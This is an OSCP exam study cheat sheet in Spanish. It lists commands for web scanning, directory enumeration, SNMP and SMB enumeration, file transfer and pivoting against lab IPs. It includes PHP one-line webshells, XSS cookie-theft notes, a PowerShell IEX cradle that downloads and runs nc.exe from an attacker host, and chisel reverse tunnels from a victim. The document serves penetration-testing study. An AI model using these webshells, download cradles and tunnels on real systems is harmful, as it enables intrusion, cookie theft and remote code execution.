
Guía de estudio OSCP
Escaneo con Nikto:
nikto -h http://10.10.10.1
Enumeración de directorios con diferentes herramientas:
DIRB
dirb http://10.10.10.1
Gobuster
gobuster dir -u http://10.129.155.74:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x aspx
Payloads XSS: Hoja de referencia: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
Pruebas básicas de formularios XSS con un listener de netcat o un servidor web de python
Cross-site scripting para volcar cookies en base64. Asegúrate de codificar la URL en burp con ctrl + u
Referencia: https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html
Webshell PHP simple para ejecución de comandos
<?php system($_REQUEST ['cmd']) ?>
<?php system($_GET['cmd']); ?>
Puerto 161 UDP
snmpwalk -c public -v2c 10.129.213.210
snmp-check 10.129.213.210
crackmapexec smb 10.129.70.254
Detectar recursos compartidos anónimos abiertos
smbclient -L //10.129.70.254
Autenticación nula
smbclient -N -L //10.129.70.254
Certutil:
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
PowerShell:
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.11.0.4/nc.exe')"
Usando Chisel:
Ejemplo usando reenvío de puertos para que el puerto 910 esté disponible en la máquina Kali
on victim machine setup port forwarding
chisel.exe client 10.10.16.10:5555 R:910:127.0.0.1:910
On Kali attack box setup a reverse listner for port forward with chisel
./chisel server --port 5555 --reverse